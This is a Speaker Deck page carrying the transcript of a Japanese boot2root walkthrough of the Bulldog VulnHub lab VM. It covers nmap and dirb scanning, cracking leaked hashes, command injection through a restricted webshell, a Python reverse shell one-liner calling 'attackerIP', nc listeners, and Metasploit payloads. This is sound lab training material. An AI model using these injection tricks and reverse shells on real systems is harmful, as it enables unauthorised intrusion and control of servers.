Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
boot2root_kalilinux_bulldog
Search
MarkUP
November 02, 2018
0
22
boot2root_kalilinux_bulldog
MarkUP
November 02, 2018
Tweet
Share
More Decks by MarkUP
See All by MarkUP
OwaspZap
markup
0
88
burpsuite_badstore
markup
0
59
boot2root_kalilinux_droopy
markup
0
29
侵入検知のファーストステップ
markup
0
660
Featured
See All Featured
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
29
9.6k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
131
19k
Building an army of robots
kneath
306
45k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
234
17k
Large-scale JavaScript Application Architecture
addyosmani
512
110k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
8
880
Practical Orchestrator
shlominoach
190
11k
Producing Creativity
orderedlist
PRO
347
40k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
283
13k
Building Adaptive Systems
keathley
43
2.7k
Mobile First: as difficult as doing things right
swwweet
223
9.9k
Transcript
サーバ侵入手法 Bulldog
BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/
Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads
Virtualbox インポート
Virtualbox ネットワーク設定
Virtualbox ネットワーク設定
Virtualbox スナップショット
ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る
ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能
ポートスキャン
サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション
サーバスキャン /dev/
ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル(/usr/share/wordlists/dirb/common.t xt)を使用してディレクトリのWebサーバー(http://192.168.99. 101/)をスキャンします。 参考:https://tools.kali.org/web-applications/dirb
ディレクトリスキャン /admin/
http(ポート80)へのアクセス ECサイトっぽいが閉鎖中
http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。
/dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される
/admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要
/dev/ ソース メールアドレスとハッシュ値を取得
ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった
管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。
WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。
echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。
「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。
ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考: http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html
ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考: http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
ReverseShell ・リバースシェルの実行 attacker target
(参考)ncコマンド ・port scaning(ポートが空いているか確認) % nc -vz [remotehost] 23 ・port knoking
(ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定
msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
Metasploit framework
Metasploit framework ・リバースシェルの実行 attacker target
Metasploit framework
root権限へ昇格
パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget
権限昇格